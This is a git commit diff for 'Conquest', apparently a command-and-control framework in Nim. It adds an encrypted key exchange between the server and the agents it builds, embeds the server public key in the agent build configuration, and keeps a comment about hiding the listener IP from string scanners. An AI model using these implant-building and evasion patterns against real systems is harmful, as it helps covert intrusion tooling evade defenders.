Implemented ECDH key exchange using ed25519 to share a symmetric AES key without transmitting it over the network.

2025-07-24 15:31:46 +02:00
parent cf4e4a7017
commit b6c720ccca
11 changed files with 166 additions and 45 deletions
--- a/src/server/core/agent.nim
+++ b/src/server/core/agent.nim
@@ -1,4 +1,4 @@
-import terminal, strformat, strutils, tables, times, system, osproc, streams
+import terminal, strformat, strutils, tables, times, system, osproc, streams, base64

 import ../utils
 import ../task/dispatcher
@@ -140,6 +140,9 @@ proc agentBuild*(cq: Conquest, listener, sleep, payload: string) =
    # Parse IP Address and store as compile-time integer to hide hardcoded-strings in binary from `strings` command
    let (first, second, third, fourth) = parseOctets(listener.address)

+    # Covert the servers's public X25519 key to as base64 string 
+    let publicKey = encode(cq.keyPair.publicKey)
+
    # The following shows the format of the agent configuration file that defines compile-time variables 
    let config = fmt"""
    # Agent configuration 
@@ -150,6 +153,7 @@ proc agentBuild*(cq: Conquest, listener, sleep, payload: string) =
    -d:Octet4="{fourth}"
    -d:ListenerPort={listener.port}
    -d:SleepDelay={sleep}
+    -d:ServerPublicKey="{publicKey}"
    """.replace("    ", "")
    writeFile(agentConfigFile, config)

--- a/src/server/core/server.nim
+++ b/src/server/core/server.nim
@@ -4,7 +4,7 @@ import strutils, strformat, times, system, tables
 import ./[agent, listener]
 import ../[globals, utils]
 import ../db/database
-import ../../common/[types, utils]
+import ../../common/[types, utils, crypto]

 #[
    Argument parsing
@@ -127,14 +127,16 @@ proc header(cq: Conquest) =
    cq.writeLine("─".repeat(21))
    cq.writeLine("")

-proc initConquest*(dbPath: string): Conquest = 
+# TODO: Add profile support instead of hardcoded paths, etc.
+proc initConquest*(): Conquest = 
    var cq = new Conquest
    var prompt = Prompt.init()
    cq.prompt = prompt
-    cq.dbPath = dbPath
+    cq.dbPath = "../data/conquest.db"
    cq.listeners = initTable[string, Listener]()
    cq.agents = initTable[string, Agent]() 
    cq.interactAgent = nil 
+    cq.keyPair = loadKeys("../data/keys/conquest-server_ed25519_private.key", "../data/keys/conquest-server_ed25519_public.key")

    return cq

@@ -146,8 +148,12 @@ proc startServer*() =
    setControlCHook(exit)

    # Initialize framework
-    let dbPath: string = "../data/conquest.db"
-    cq = initConquest(dbPath) 
+    try:
+        cq = initConquest()
+
+    except CatchableError as err:
+        echo err.msg
+        quit(0)

    # Print header
    cq.header()
@@ -156,7 +162,7 @@ proc startServer*() =
    cq.dbInit()
    cq.restartListeners()
    cq.addMultiple(cq.dbGetAllAgents())
-    
+
    # Main loop
    while true: 
        cq.setIndicator("[conquest]> ")